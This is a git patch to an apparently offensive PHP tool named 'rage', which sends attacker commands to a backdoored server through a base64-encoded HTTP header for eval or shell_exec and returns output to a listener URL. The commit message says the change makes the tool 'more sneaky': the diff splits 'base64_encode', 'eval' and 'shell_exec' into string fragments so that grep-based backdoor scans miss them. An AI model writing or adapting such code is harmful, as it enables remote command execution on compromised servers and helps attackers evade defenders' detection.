From 612f62f5bcf3d5532f9f7c3e91d328ff53277bf2 Mon Sep 17 00:00:00 2001
From: 0xAli <protectednet@hotmail.com>
Date: Thu, 3 Apr 2014 09:47:38 +0200
Subject: [PATCH] It would be more sneaky that way.

Me and many others grep for obvious functions/macros that are used heavenly in backdoors like base64/eval/exec/mail/etc, this way it's ore sneaky.
Tested on ver 5.3.13.
---
 rage | 5 +++--
 1 file changed, 3 insertions(+), 2 deletions(-)

diff --git a/rage b/rage
index 9dfcfb4..b96cfa2 100755
--- a/rage
+++ b/rage
@@ -47,10 +47,11 @@ while(!$done) {
 
 function send($command, $isphp = False) {
     $charset = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ=";
+    $charset2= 'bas'.'e'.(32*2).'_enc'.'ode';
     if($isphp) {
-        $headersArray = array("LENGTH: ".get_random_string($charset, 2).base64_encode("eval"."\x15".$command." 2>&1"."\x15".LISTENER_URL."/?r="), 'Expect:' );
+        $headersArray = array("LENGTH: ".get_random_string($charset, 2).$charset2("ev"."al"."\x15".$command." 2>&1"."\x15".LISTENER_URL."/?r="), 'Expect:' );
     } else {
-        $headersArray = array("LENGTH: ".get_random_string($charset, 2).base64_encode("shell_exec"."\x15".$command." 2>&1"."\x15".LISTENER_URL."/?r="), 'Expect:' );
+        $headersArray = array("LENGTH: ".get_random_string($charset, 2).$charset2("sh"."el"."l_e"."xec"."\x15".$command." 2>&1"."\x15".LISTENER_URL."/?r="), 'Expect:' );
     }
     $curl = curl_init();
     curl_setopt_array($curl, array(